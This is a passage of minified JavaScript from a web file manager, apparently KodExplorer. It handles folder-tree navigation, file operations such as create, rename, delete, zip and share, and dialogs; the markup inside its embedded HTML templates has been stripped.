s=[G.KOD_USER_SHARE,G.KOD_USER_FAV,G.KOD_GROUP_ROOT_SELF,G.KOD_GROUP_ROOT_ALL],r=".kod-toolbar-recycle,.kod-toolbar-share";$(r).addClass("hidden"),a==G.KOD_USER_RECYCLE?(o.removeClass(n).addClass("menu-recycle-body"),$(".tools-left .kod-toolbar").addClass("hidden"),$(".kod-toolbar-recycle").removeClass("hidden")):-1!==s.indexOf(a)?-1===core.pathClear(rtrim(G.thisPath,"/")).indexOf("/")?(o.removeClass(n).addClass("menu-share-body"),$(".tools-left .kod-toolbar").addClass("hidden"),$(".kod-toolbar-share").removeClass("hidden"),t.id==G.userID?($(".menu-share-path-menu").find(".open-the-path,.share-edit,.remove").removeClass("hidden"),$(".menu-share-path-more").find(".remove").removeClass("hidden")):($(".menu-share-path-menu").find(".open-the-path,.share-edit,.remove").addClass("hidden"),$(".menu-share-path-more").find(".remove").addClass("hidden"))):(o.removeClass(n).addClass("menu-body-main"),$(".tools-left .kod-toolbar").addClass("hidden"),$(".kod-toolbar-path").removeClass("hidden")):(o.removeClass(n).addClass("menu-body-main"),$(".tools-lef .kod-toolbar").addClass("hidden"),$(".kod-toolbar-path").removeClass("hidden")),currentPathMenu(e)}},currentPathMenu=function(e){var t=e.info,a=e.pathReadWrite,i=t.pathType,n=".create-link,.create-project,.cute,.remove,.rname,.zip,.unzip-this,.unzip-folder,.newfile,.newfolder,.new-file-other,.app-create,.app-install,.past,.upload,.clone",o="disable",s=$(".kod-toolbar-path .btn").not(".toolbar-path-more"),r=$("ul.menu-folder,ul.menu-more,ul.menu-file,ul.file-continerMenu");t.canUpload?(r.find(n).removeClass(o),$(".path-tips").hide(),s.removeClass("disabled")):(s.addClass("disabled"),r.find(n).addClass(o),$(".path-tips span").html(LNG.only_read),i==G.KOD_USER_RECYCLE||i==G.KOD_USER_SHARE?($(".path-tips").hide(),s.removeClass("disabled"),i==G.KOD_USER_SHARE&&G.userID!=t.id&&s.addClass("disabled")):$(".path-tips").show());var l=$(".group-space-use");if((i==G.KOD_GROUP_PATH||i==G.KOD_GROUP_SHARE)&&G.isRoot||i==G.KOD_GROUP_PATH&&"owner"==t.role){var c=e.groupSpaceUse;if(c){var d=core.userSpaceHtml(c.sizeUse+"/"+c.sizeMax);l.removeClass("hidden").html(d)}else l.addClass("hidden")}else l.addClass("hidden");if(e.userSpace){var c=e.userSpace,d=core.userSpaceHtml(c.sizeUse+"/"+c.sizeMax);$(".user-space-info").html(d)}if("notExists"==a&&($(".path-tips span").html(LNG.not_exists),$(".path-tips").show()),$(".role-label-box").html(""),i==G.KOD_GROUP_SHARE){var p=""+LNG.group_guest+"";$(".role-label-box").html(p),G.isRoot&&$(".role-label-box").html("")}else if(i==G.KOD_GROUP_PATH&&t.groupRole){var p=""+t.groupRole.name+"";$(".role-label-box").html(p)}(i==G.KOD_GROUP_ROOT_ALL||i==G.KOD_GROUP_ROOT_SELF||i==G.KOD_USER_FAV||i==G.KOD_GROUP_SHARE)&&$(".path-tips").hide(),1==G.isRoot&&t.adminRealPath?$(".admin-real-path").removeClass("hidden"):$(".admin-real-path").addClass("hidden")};return{f5:f5,f5Callback:f5Callback,pathTypeChange:pathTypeChange,pathChildrenTree:pathChildrenTree,pathChildrenSplit:pathChildrenSplit,init:function(){$(window).bind("resize",function(){resetTotalHeight(),core.isApp("desktop")?ui.resetDesktopIcon():ui.headerAddress.resetWidth()}),bindScrollLoadMore()}}}),define("app/path/tpl/file/list.html",[],"\n{{if type=='icon-folder'}}\n
      \n {{if !list.menuType}}
      {{/if}}\n
      \n
      \n {{fileIconMake('folder','icon',list)}}\n
      \n {{if list.metaInfo}}\n
      {{list.metaInfo |kod.core.icon}}
      \n {{/if}}\n
      \n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{list.name}}\n {{/if}}\n \n
      \n
      \n\n\n{{else if type=='list-folder'}}\n
      \n {{if !list.menuType}}
      {{/if}}\n
      \n
      \n {{if list.metaInfo}}\n
      {{list.metaInfo |kod.core.icon}}
      \n {{/if}}\n \n {{if list.isParent&&list.isReadable}}{{/if}}\n \n
      \n {{fileIconMake('folder','list',list)}}\n
      \n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{list.name}}\n {{/if}}\n \n
      \n
      {{LNG.folder}}
      \n
      \n
      {{list.mtime || \"\"}}
      \n
      \n
      \n{{if list.isParent&&list.isReadable}}\n
      \n{{/if}}\n\n\n{{else if type=='split-folder'}}\n
      \n {{if !list.menuType}}
      {{/if}}\n
      \n
      \n {{if list.metaInfo}}\n
      {{list.metaInfo |kod.core.icon}}
      \n {{/if}}\n
      \n {{fileIconMake('folder','split',list)}}\n
      \n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{list.name}}\n {{/if}}\n \n \n {{if list.isReadable && typeof(list.menuType)==\"undefined\"}}\n \n {{/if}}\n \n
      \n
      \n\n\n{{else if type=='icon-file'}}\n
      \n {{if !list.menuType}}
      {{/if}}\n
      \n {{fileIconMake('file','icon',list)}}\n {{if list.metaInfo}}\n
      {{list.metaInfo |kod.core.icon}}
      \n {{/if}}\n
      \n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{if list.ext=='oexe'}}{{list.name.replace('.oexe','')}}{{else}}{{list.name}}{{/if}}\n {{/if}}\n \n
      \n
      \n\n\n{{else if type=='list-file'}}\n
      \n {{if !list.menuType}}
      {{/if}}\n
      \n
      \n \n {{fileIconMake('file','list',list)}}\n {{if list.metaInfo}}\n
      {{list.metaInfo |kod.core.icon}}
      \n {{/if}}\n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{if list.ext=='oexe'}}{{list.name.replace('.oexe','')}}{{else}}{{list.name}}{{/if}}\n {{/if}}\n \n
      \n
      {{list.ext |kod.window.htmlEncode}} {{LNG.file}}
      \n
      {{list.size |pathTools.fileSize}}
      \n
      {{list.mtime || \"\"}}
      \n
      \n
      \n\n\n{{else if type=='split-file'}}\n
      \n {{if !list.menuType}}
      {{/if}}\n
      \n
      \n {{fileIconMake('file','split',list)}}\n {{if list.metaInfo}}\n
      {{list.metaInfo |kod.core.icon}}
      \n {{/if}}\n \n {{if typeof(list.exists)=='number' && list.exists==0}}\n {{list.name}}\n {{else}}\n {{if list.ext=='oexe'}}{{list.name.replace('.oexe','')}}{{else}}{{list.name}}{{/if}}\n {{/if}}\n \n
      \n
      \n{{/if}}\n\n"),define("app/common/tree",["../path/pathOperate","../path/clipboard","../path/search"],function(e){var t,a,i=e("../path/pathOperate"),n=e("../path/clipboard"),o=e("../path/search"),s=!1; ui.pathOperate=i;var r=function(e,t){var a=["menu-tree-group","menu-tree-fav","menu-tree-folder-fav"];if(e&&e[0]&&-1!==$.inArray(e[0].menuType,a))return e;for(var i=[],n=[],o=0;e.length>o;o++)e[o].drop=!1,e[o].drag=!1,e[o].name=e[o].name,e[o].isParent&&e[o].children&&(e[o].children=r(e[o].children)),e[o].isWriteable,"folder"==e[o].type?n.push(e[o]):i.push(e[o]);return t?e:(n=n.sort(function(e,t){var e=e.name,t=t.name;return pathTools.strSort(e,t)}),i=i.sort(function(e,t){var e=e.name,t=t.name;return pathTools.strSort(e,t)}),n.concat(i))},l=function(){var e={},t="tree_open_"+md5(Config.pageApp),i=function(e){if(!LocalData.support())return{};if(void 0==e){var a=LocalData.getConfig(t);return 0==a?{}:a}LocalData.setConfig(t,e)},n=function(t){for(var a=0;t.length>a;a++){var i=t[a].path;void 0!==e[i]&&(t[a].open=e[i])}return t},o=function(){for(var t=a.getNodesByFilter(function(e){return 0==e.level?!0:!1}),n={},o=0;t.length>o;o++)n[t[o].path]=t[o].open;return e=n,i(e),e};return e=i(),{list:function(){return e},reset:n,save:o}}(),c=function(){$.ajax({url:G.appHost+Config.treeAjaxURL+"&type=init",dataType:"json",error:function(){$("#folder-list-tree").html('
      '+LNG.system_error+"
      ")},success:function(e){if(!e.code)return $("#folder-list-tree").html('
      '+LNG.system_error+"
      "),void 0;var t=r(e.data,!0);t=l.reset(t),$.fn.zTree.init($("#folder-list-tree"),u,t),a=$.fn.zTree.getZTreeObj("folder-list-tree")}}),$(".ztree .switch").die("mouseenter").live("mouseenter",function(){$(this).addClass("switch_hover")}).die("mouseleave").live("mouseleave",function(){$(this).removeClass("switch_hover")}),core.isApp("editor")&&(Mousetrap.bind("up",function(e){d(e,"up")}).bind("down",function(e){d(e,"down")}).bind("left",function(e){d(e,"left")}).bind("right",function(e){d(e,"right")}),Mousetrap.bind("enter",function(){tree.open()}).bind(["del","command+backspace"],function(){tree.remove()}).bind("f2",function(e){stopPP(e),tree.rname()}).bind(["ctrl+f","command+f"],function(e){stopPP(e),tree.search()}).bind(["ctrl+c","command+c"],function(){tree.copy()}).bind(["ctrl+x","command+x"],function(){tree.cute()}).bind(["ctrl+v","command+v"],function(){tree.past()}).bind("alt+m",function(){tree.create("folder")}).bind("alt+n",function(){tree.create("file")}))},d=function(e,t){stopPP(e);var i=a.getSelectedNodes()[0];if(i)switch(t){case"up":var n=i.getPreNode();if(n){if(n.open&&n.children.length>0)for(;n.open&&n.children&&n.children.length>=1;)n=n.children[n.children.length-1]}else n=i.getParentNode();a.selectNode(n);break;case"down":if(i.open&&i.children.length>=1)n=i.children[0];else{var o=i,n=o.getNextNode()||o.getParentNode().getNextNode();try{for(;!n;)o=o.getParentNode(),n=o.getNextNode()||o.getParentNode().getNextNode()}catch(e){}}a.selectNode(n);break;case"left":i.isParent?i.open?a.expandNode(i,!1):a.selectNode(i.getParentNode()):a.selectNode(i.getParentNode());break;case"right":i.open?a.selectNode(i.children[0]):a.expandNode(i,!0);break;default:}},p=function(){return core.isApp("editor")?!1:!0},u={async:{enable:!0,dataType:"json",url:function(){return G.appHost+Config.treeAjaxURL},autoParam:["ajax_path=path","tree_icon=tree_icon"],dataFilter:function(e,t,a){return a.code?r(a.data):null}},edit:{enable:!0,showRemoveBtn:!1,showRenameBtn:!1,drag:{isCopy:!1,isMove:!1}},view:{showLine:!1,selectedMulti:!1,expandSpeed:"fast",dblClickExpand:!1,addDiyDom:function(e,t){var a=15,i=$("#"+t.tId+"_switch"),n=$("#"+t.tId+"_ico");i.remove(),t.iconSkin=t.tree_icon;var o=t.tree_icon;if(t.ext?o=t.ext:t.tree_icon||(o=t.type),n.before(i).before(''+core.iconSmall(o)+"").remove(),void 0!=t.ext&&n.attr("class","").addClass("file "+t.ext).removeAttr("style"),t.level>=1){var s="";i.before(s)}i.before("");var r="";void 0!=t.menuType?r=t.menuType:(("file"==t.type||"oexe"==t.ext)&&(r="menu-tree-file"),"folder"==t.type&&(r="menu-tree-folder"));var l=LNG.name+":"+t.name+"\n"+LNG.size+":"+pathTools.fileSize(t.size)+"\n"+LNG.modify_time+":"+t.mtime;"file"!=t.type&&(l=t.name),i.parent().addClass(r).attr("title",l),0==t.isWriteable&&i.parent().addClass("file-not-writeable"),0==t.isReadable&&i.parent().addClass("file-not-readable"),0===t.exists&&i.parent().addClass("file-not-readable")}},callback:{onClick:function(e,t,i){if($(e.target).hasClass("menu-item")||$(e.target).parent().hasClass("menu-item")){var n=$("#"+i.tId+"_a"),o=n.find(".menu-item");return n.contextMenu({x:o.offset().left+o.width(),y:o.offset().top}),stopPP(e)}return a.selectNode(i),core.isApp("editor")&&"folder"==i.type?(a.expandNode(i),void 0):(core.isApp("editor")||"folder"!=i.type?(kodApp.setLastOpenTarget($("#"+i.tId)),kodApp.open(f().path)):ui.path.list(i.path),void 0)},beforeDblClick:function(){return!0},onCollapse:function(e,t,a){0==a.level&&l.save()},onExpand:function(e,t,a){0==a.level&&l.save()},onDblClick:function(e,t,i){return $(e.target).hasClass("switch")||!p()?!1:(a.expandNode(i),void 0)},beforeRightClick:function(e,t){a.selectNode(t)},beforeAsync:function(e,t){t.ajax_name=t.name,t.ajax_path=t.path,$("#"+t.tId+"_my_ico").addClass("ico_loading")},onAsyncSuccess:function(e,i,n,o){return $("#"+n.tId+"_my_ico").removeClass("ico_loading"),0==o.data.length?(a.removeChildNodes(n),void 0):("function"==typeof t&&(t(),t=void 0),void 0)},onRename:function(e,n,o){var s=o.getParentNode();if(a.getNodesByParam("name",o.name,s).length>1)return Tips.tips(LNG.name_isexists,!1),a.removeNode(o),void 0;if(o.create){var r=o.path+"/"+o.name;"folder"==o.type?i.newFolder(r,function(){t=function(){var e=a.getNodesByParam("name",o.name,s)[0];a.selectNode(e),b()},h(s)}):i.newFile(r,function(){t=function(){var e=a.getNodesByParam("name",o.name,s)[0];a.selectNode(e),b()},h(s)})}else{var l=rtrim(o.path,"/"),c=core.pathFather(o.path)+o.name;i.rname(l,c,function(e){o.path=e,t=function(){var e=a.getNodesByParam("name",o.name,s)[0];a.selectNode(e),b(),"folder"==o.type&&ui.path.list(o.path)},h(s)})}},beforeDrag:function(e,t){for(var a=0,i=t.length;i>a;a++)if(t[a].drag===!1)return!1;return!0},beforeDrop:function(e,t,a){return a?a.drop!==!1:!0},onDrop:function(e,t,a,i){var o="",s="",r=a[0];(r.father||r.thisPath)&&(o=r.father+urlEncode(r.name),s=i.father+urlEncode(i.name),n.cuteDrag([{path:o,type:r.type}],s,function(){h(r)}))}}},f=function(e){if(a){var t=a.getSelectedNodes()[0],i="";return t?(i=t.type,("_null_"==i||void 0==i)&&(i="folder"),"file"==i&&(i=t.ext),e?[{path:t.path,type:i,node:t}]:{path:t.path,type:i,node:t}):{path:"",type:""}}},h=function(e){return e||(e=a.getSelectedNodes()[0]),e.isParent||(e=e.getParentNode())?(a.reAsyncChildNodes(e,"refresh"),void 0):(ui.tree.init(),void 0)},m=function(){g(G.KOD_USER_FAV),b()},v=function(){m(),g(G.KOD_GROUP_ROOT_SELF),g(G.KOD_GROUP_ROOT_ALL)},g=function(e){var t=a.getNodesByParam("path",e,null);h(t[0])},b=function(){core.isApp("explorer")&&ui.f5()};return{makeParam:f,treeOpenHistory:l,treeDataSort:r,init:c,refresh:h,refreshPath:g,refreshFav:m,refreshGroup:v,zTree:function(){return a},openEditor:function(){kodApp.open(f().path)},openWindow:function(){kodApp.openWindow(f().path)},share:function(){i.share(f())},download:function(){"folder"==f().type?i.zipDownload(f(!0)):kodApp.download(f().path)},setSelect:function(e){return},open:function(){if(!($(".dialog-path-remove").length>=1)){var e=f();"oexe"==e.type&&(e.path=e.node),kodApp.setLastOpenTarget($(".curSelectedNode").parent()),kodApp.open(e.path,e.type)}},fav:function(){var e=f();e.name=e.node.name,e.node="null",i.fav(e)},createLink:function(e){var t=f();i.createLink(t.path,t.node.name,t.type,e,b)},search:function(){o("",f().path)},appEdit:function(){var e=f(),t=e.node;t.path=e.path,i.appEdit(t,function(){h(e.node.getParentNode())})},info:function(){i.info(f(!0))},copy:function(){n.copy(f(!0))},cute:function(){n.cute(f(!0))},copyTo:function(){core.api.pathSelect({type:"folder",title:LNG.copy_to},function(e){n.copyDrag(f(!0),e,"",!1)})},cuteTo:function(){core.api.pathSelect({type:"folder",title:LNG.cute_to},function(e){n.cuteDrag(f(!0),e,function(){g()})})},past:function(){var e=f();e.node.isParent||(e.node=e.node.getParentNode()),n.past(e.path,function(){b(),h(e.node)})},clone:function(){var e=f();e.node.isParent||(e.node=e.node.getParentNode()),n.copyDrag(f(!0),core.pathFather(e.path),function(){b(),"folder"==e.type?h(e.node.getParentNode()):h(e.node)},!0)},favRemove:function(){i.favRemove(f().node.name,function(e){Tips.tips(e),m()})},remove:function(){var e=f(!0),t=e[0].node.getParentNode();e[0].type=e[0].node.type,e[0].type="folder"==e[0].type?"folder":"file",i.remove(e,function(){b(),h(t)})},checkIfChange:function(e){s||(s=!0,a&&(a.getNodesByFilter(function(t){var a=t.path;return"folder"==t.type&&core.pathClear(a)==core.pathClear(e)&&h(t),!1},!0),setTimeout(function(){s=!1},500)))},explorer:function(){var e=a.getSelectedNodes();if(0>=e.length){var t=a.getNodes();a.selectNode(t[0])}var i=f().path;"folder"!=f().type&&(i=core.pathFather(i)),core.explorer(i)},openProject:function(){core.explorerCode(f().path)},create:function(e){var i=a.getSelectedNodes();if(0>=i.length){var n=a.getNodes();a.selectNode(n[0])}else"file"==i[0].type&&a.selectNode(i[0].getParentNode());var o=f(),s=o.node,r=s.getParentNode(),l="newfile",c=0,d=LNG.newfolder;if("folder"==e){for(;a.getNodesByParam("name",d+"("+c+")",r).length>0;)c++;newNode={name:d+"("+c+")",ext:"",type:"folder",create:!0,path:o.path}}else{for(var p=e;a.getNodesByParam("name",l+"("+c+")."+p,r).length>0;)c++;newNode={name:l+"("+c+")."+p,ext:p,type:"file",create:!0,path:o.path}}if(void 0!=s.children){var u=a.addNodes(s,newNode)[0];a.editName(u)}else"folder"!=s.type&&(s=s.getParentNode()),t=function(){var e=a.addNodes(s,newNode)[0];a.editName(e)},s.isParent?a.expandNode(s):t()},showFile:function(){var e=G.appHost+"share/file&sid="+G.sid+"&user="+G.user+"&path="+f().path;window.open(e)},rname:function(){var e=a.getSelectedNodes()[0];a.editName(e),e.beforeName=e.name}}}),define("app/path/pathOperate",[],function(e){tplFileInfo=e("./tpl/fileinfo/fileInfo.html"),tplPathInfo=e("./tpl/fileinfo/pathInfo.html");var t=["/","\\",":","*","?",'"',"<",">","|"],a=["/","\\"],i=function(e){var i=function(e,t){for(var a=t.length,i=0;a>i;i++)if(e.indexOf(t[i])>0)return!0;return!1},n=a;return G.systemOS&&"windows"==G.systemOS&&(n=t),i(e,n)?(Tips.tips(LNG.path_not_allow+": "+n.join(", "),!1),!1):!0},n=function(e){for(var t=[],a=function(e){return e?e.replace(/"/g,'\\\\"'):e},i=0;e.length>i;i++)t.push({type:a(e[i].type),path:urlEncode(a(e[i].path))});return"dataArr="+jsonEncode(t)},o=function(e,t){if(e){var a=core.pathThis(e);return i(a)?($.ajax({dataType:"json",url:G.appHost+"explorer/mkfile&path="+urlEncode(e),beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof t&&(e&&e.info?t(e.info):t(!1))}}),void 0):("function"==typeof t&&t(),void 0)}},s=function(e,t){if(e){var a=core.pathThis(e);return i(a)?($.ajax({dataType:"json",url:G.appHost+"explorer/mkdir&path="+urlEncode(e),beforeSend:function(){"function"==typeof t&&Tips.loading()},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof t&&(e&&e.info?t(e.info):t(!1))}}),void 0):("function"==typeof t&&t(),void 0)}},r=function(e,t,a){return e&&t&&e!=t?i(core.pathThis(t))?($.ajax({type:"POST",dataType:"json",url:G.appHost+"explorer/pathRname",data:"path="+urlEncode(e)+"&rnameTo="+urlEncode(t),beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof a&&(e&&e.info?a(e.info):a(!1))}}),void 0):("function"==typeof a&&a(),void 0):void 0},l=function(e,t,a,i){if(a=void 0==a?!1:a,i=void 0==i?!1:i,window.event&&window.event.shiftKey&&(i=!0),!(1>e.length)){var o=LNG.remove_title,s=LNG.remove_info,r=G.appHost+"explorer/pathDelete",l=n(e);if("share"==e[0].type&&(o=LNG.share_remove,s=LNG.share_remove_tips,r=G.appHost+"userShare/del"),i&&(s=LNG.remove_info_force,o=LNG.remove_title_force,r+="&shiftDelete=1"),("recycle-clear"==e[0].type||G.USER_RECYCLE&&G.thisPath==G.USER_RECYCLE||G.thisPath==core.pathFather(G.myhome)+"recycle_kod/")&&(s=LNG.recycle_clear_info,r=G.appHost+"explorer/pathDeleteRecycle",o=LNG.recycle_clear,"recycle-clear"==e[0].type&&(l="postEmpty=1")),e[0]&&e[0].path){var c=""+htmlEncode(core.pathThis(e[0].path))+"";s=e.length>1?c+' ... '+e.length+LNG.remove_item+"
      "+s:c+"
      "+s}var d=function(){$.ajax({url:r,type:"POST",dataType:"json",data:l,beforeSend:function(){Tips.loading()},error:core.ajaxError,success:function(a){if(Tips.close(a),ShareData.frameTop("",function(e){e.ui.f5()}),"share"==e[0].type){G.selfShare=a.info;var i=$.dialog.list["share-dialog"];void 0!=i&&i.close()}o==LNG.recycle_clear?core.playSound("recycle_clear"):core.playSound("file_remove"),"function"==typeof t&&t(a)}})};a?d():$.dialog({id:"dialog-path-remove",fixed:!0,icon:"question",title:o,padding:"40px 40px",lock:!0,background:"#000",opacity:.1,content:"
      "+s+"
      ",ok:d,cancel:!0})}},c=function(e){if(core.authCheck("explorer.fileDownload",!0)&&!(1>e.length)){var t=G.appHost+"explorer/zipDownload";G.sharePage!==void 0&&(t=G.appHost+"share/zipDownload&user="+G.user+"&sid="+G.sid),$.ajax({url:t,type:"POST",dataType:"json",data:n(e),beforeSend:function(){Tips.loading(LNG.zip_download_ready)},error:core.ajaxError,success:function(e){Tips.close(e),Tips.tips(e);var t=G.appHost+"explorer/fileDownloadRemove&path="+urlEncode(e.info);t+="&accessToken="+G.accessToken,G.sharePage!==void 0&&(t=G.appHost+"share/fileDownloadRemove&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(e.info)),$.dialog({icon:"succeed",title:!1,time:2,content:LNG.download_ready+"..."}),$('').appendTo("body")}})}},d=function(e,t,a){1>e.length||(a||(a="zip"),$.ajax({url:G.appHost+"explorer/zip&fileType="+a,type:"POST",dataType:"json",data:n(e),beforeSend:function(){Tips.loading(LNG.ziping)},error:core.ajaxError,success:function(e){Tips.close(e),e.code&&core.playSound("drag_drop"),"function"==typeof t&&t(e.info)}}))},p=function(e,t,a){if(e){var i=function(e){$.ajax({url:e,beforeSend:function(){Tips.loading(LNG.unziping)},error:core.ajaxError,success:function(e){Tips.close(e),"function"==typeof t&&t(e)}})},n=G.appHost+"explorer/unzip&path="+urlEncode(e);"toThis"==a&&(n+="&toThis=1"),"toFolder"==a?core.api.pathSelect({type:"folder",title:LNG.unzip_to},function(e){n+="&pathTo="+e,i(n)}):i(n)}},u=function(e){var t=e.path,a=core.pathPre(t);if(a==G.KOD_GROUP_PATH||a==G.KOD_GROUP_SHARE||a==G.KOD_USER_SHARE)return Tips.tips(LNG.path_can_not_share,"warning"),void 0;var i="folder"==e.type?"folder":"file";1>t.length||core.authCheck("userShare.set",!0)&&$.ajax({url:G.appHost+"userShare/checkByPath&path="+urlEncode(t),dataType:"json",error:core.ajaxError,success:function(e){if(e.code)f(e.data);else{G.selfShare=e.info;var a={path:t,type:i,name:core.pathThis(t)};h(a,function(e){e.code?(G.selfShare=e.info,ui.f5(),f(e.data)):(Tips.tips(e),f(void 0,function(){$(".content-info input[name=type]").val(i),$(".content-info input[name=path]").val(t),$(".content-info input[name=name]").val(core.pathThis(t)+"(1)"),"file"==i&&($(".label-code-read").addClass("hidden"),$(".label-can-upload").addClass("hidden"))}))})}}})},f=function(t,a){0!=$(".share-dialog").length&&$(".share-dialog").shake(3,30,100),e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){m(t),void 0!=a&&a()})},h=function(e,t){$.ajax({url:G.appHost+"userShare/set",data:e,type:"POST",dataType:"json",beforeSend:function(){$(".share-create-button").addClass("disabled")},error:function(){Tips.tips(LNG.error,!1)},success:function(e){$(".share-create-button").removeClass("disabled"),void 0!=t&&t(e)}})},m=function(t){var a=e("./tpl/share.html"),i=template.compile(a),n=i({LNG:LNG});$.dialog({id:"share-dialog",simple:!0,resize:!1,width:425,title:LNG.share,padding:"0",fixed:!0,content:n});var o="zh-CN"==G.lang?"ch":"en";$("#share-time").datetimepicker({format:"Y/m/d",formatDate:"Y/m/d",timepicker:!1,lang:o}),$("#share-time").unbind("blur").bind("blur",function(e){stopPP(e)});var s=function(e){if($(".share-setting-more").addClass("hidden"),void 0==e)$(".share-has-url").addClass("hidden"),$(".share-action .share-remove-button").addClass("hidden"),$(".content-info input[name=sid]").val(""),$(".content-info input[name=type]").val(""),$(".content-info input[name=name]").val(""),$(".content-info input[name=showName]").val(""),$(".content-info input[name=path]").val(""),$(".content-info input[name=timeTo]").val(""),$(".content-info input[name=sharePassword]").val(""),$(".share-view-info").addClass("hidden");else{e.canUpload===void 0&&(e.canUpload=""),t=e,e.showName||(e.showName=e.name),$(".content-info input[name=sid]").val(e.sid),$(".content-info input[name=type]").val(e.type),$(".content-info input[name=name]").val(e.name),$(".content-info input[name=showName]").val(e.showName),$(".content-info input[name=path]").val(e.path),$(".content-info input[name=timeTo]").val(e.timeTo),$(".content-info input[name=sharePassword]").val(e.sharePassword),$(".share-view-info").removeClass("hidden"),e.numDownload===void 0&&(e.numDownload=0),e.numView===void 0&&(e.numView=0);var a=LNG.share_view_num+e.numView+" "+LNG.share_download_num+e.numDownload;$(".share-view-info").html(a),"1"==e.codeRead?$(".content-info input[name=codeRead]").attr("checked","checked"):$(".content-info input[name=codeRead]").removeAttr("checked"),"1"==e.notDownload?$(".content-info input[name=notDownload]").attr("checked","checked"):$(".content-info input[name=notDownload]").removeAttr("checked"),"1"==e.canUpload?$(".content-info input[name=canUpload]").attr("checked","checked"):$(".content-info input[name=canUpload]").removeAttr("checked"),$(".share-has-url").removeClass("hidden"),"file"==e.type?($(".label-code-read").addClass("hidden"),$(".label-can-upload").addClass("hidden")):($(".label-code-read").removeClass("hidden"),$(".label-can-upload").removeClass("hidden"));var i=e.type;"folder"==e.type&&(i=1==e.codeRead?"codeRead":"folder");var n=G.appHost+"share/"+i+"&user="+G.userID+"&sid="+e.sid;$(".content-info .share-url").val(n),(e.timeTo||e.sharePassword||e.canUpload||e.codeRead||e.notDownload)&&$(".share-setting-more").removeClass("hidden"),$(".share-remove-button").removeClass("hidden"),$(".share-create-button").text(LNG.share_save)}},r=function(){$(".share-action .share-remove-button").unbind("click").click(function(){l([{type:"share",path:t.sid}],function(){ui.f5()})}),$(".content-info .share-more").unbind("click").click(function(){$(".share-setting-more").toggleClass("hidden")}),$(".share-action .share-create-button").unbind("click").click(function(){var e="";$(".share-dialog .content-info input[name]").each(function(){var t=urlEncode($(this).val());"checkbox"==$(this).attr("type")&&(t=$(this).attr("checked")?"1":""),e+="&"+$(this).attr("name")+"="+t}),h(e,function(e){e.code?(Tips.tips(LNG.success,!0),G.selfShare=e.info,ui.f5(),s(e.data),$(".share-create-button").text(LNG.share_save)):Tips.tips(e)})}),$(".content-info .open-window").unbind("click").bind("click",function(){window.open($("input.share-url").val())}),$(".content-info .qrcode").unbind("click").bind("click",function(){core.qrcode($("input.share-url").val())});var e=$("input.share-url"),a=e.get(0);e.unbind("hover click").bind("hover click",function(){$(this).focus();var t=e.val().length;if($.browser.msie){var i=a.createTextRange();i.moveEnd("character",-a.value.length),i.moveEnd("character",t),i.moveStart("character",0),i.select()}else a.setSelectionRange(0,t)})};s(t),r()},v=function(e){$.ajax({url:G.appHost+"setting/set&k=wall&v="+urlEncode(e),dataType:"json",success:function(e){Tips.tips(e)}})},g=function(e,t,a,i,n){if(!(1>e.length)){var o,s=G.myDesktop;i&&(s=core.pathFather(e)),o="folder"==a?"ui.path.list(hashDecode('"+hashEncode(e)+"'));":"ui.path.open(hashDecode('"+hashEncode(e)+"'));";var r=urlEncode(s+t+".oexe"),l=core.getPathIcon(e);""==l.icon&&(l.icon=a),$.ajax({url:G.appHost+"explorer/mkfile&path="+r,type:"POST",dataType:"json",data:{content:jsonEncode({type:"app_link",content:o,icon:l.icon})},success:function(e){Tips.tips(e),e.code&&(ShareData.frameTop("",function(e){e.ui.f5()}),"function"==typeof n&&n(e.info))}})}},b=function(e,t){if(!(1>e.length)){var a=core.pathThis(e),i=core.pathFather(e);jsrun="core.explorerCode('"+urlEncode(e)+"');";var n=urlEncode(i+a+"_project.oexe");$.ajax({url:G.appHost+"explorer/mkfile&path="+n,type:"POST",dataType:"json",data:'content={"type":"app_link","content":"'+jsrun+'","icon":"folder.png"}',success:function(e){e.code&&"function"==typeof t&&t(e.info)}})}},y=function(e,t,a){if(e){var i=G.appHost+"explorer/imageRotate&rotate="+t+"&path="+urlEncode(e);$.ajax({url:i,beforeSend:function(){Tips.loading(LNG.loading)},error:core.ajaxError,success:function(e){return e?(Tips.close(e),e.code&&"function"==typeof a&&a(e),void 0):(Tips.close(LNG.php_env_error_gd,!1),void 0)}})}},k=function(t){var a={};a.fileInfo=e("./tpl/fileinfo/fileInfo.html"),a.pathInfo=e("./tpl/fileinfo/pathInfo.html"),a.pathInfoMore=e("./tpl/fileinfo/pathInfoMore.html"),1>t.length&&(t=[{path:G.thisPath,type:"folder"}]);var i="info";1==t.length&&(i="file"==t[0].type?core.pathExt(t[0].path):"folder"),Tips.loading(LNG.getting),core.fileInfo(n(t),function(e){if(!e.code)return Tips.close(e),void 0;Tips.close(LNG.get_success,!0);var n="pathInfoMore",o=LNG.info;1==t.length&&(n="folder"==t[0].type?"pathInfo":"fileInfo",o=core.pathThis(t[0].path),o.length>15&&(o=o.substr(0,15)+"... "+LNG.info));var s=template.compile(a[n]),r=UUID();e.data.is_root=G.isRoot,e.data.LNG=LNG,e.data.atime=date(LNG.time_type_info,e.data.atime),e.data.ctime=date(LNG.time_type_info,e.data.ctime),e.data.mtime=date(LNG.time_type_info,e.data.mtime),e.data.sizeFriendly=pathTools.fileSize(e.data.size);var l=$.dialog({id:r,padding:5,ico:core.iconSmall(i),fixed:!0,title:o,content:s(e.data),ok:!0}),c=15*$(".aui-outer .pathinfo").length;l.DOM.wrap.css({left:"+="+c+"px",top:"+="+c+"px"}),x(r,t)})},x=function(e,t){var a=$("."+e);a.find(".open-window").bind("click",function(){window.open(a.find("input.download-url").val())}),a.find(".qrcode").unbind("click").bind("click",function(){core.qrcode(a.find("input.download-url").val(),a.find(".qrcode").get(0))});var i=a.find(".file-md5-loading");if(1==i.length){var 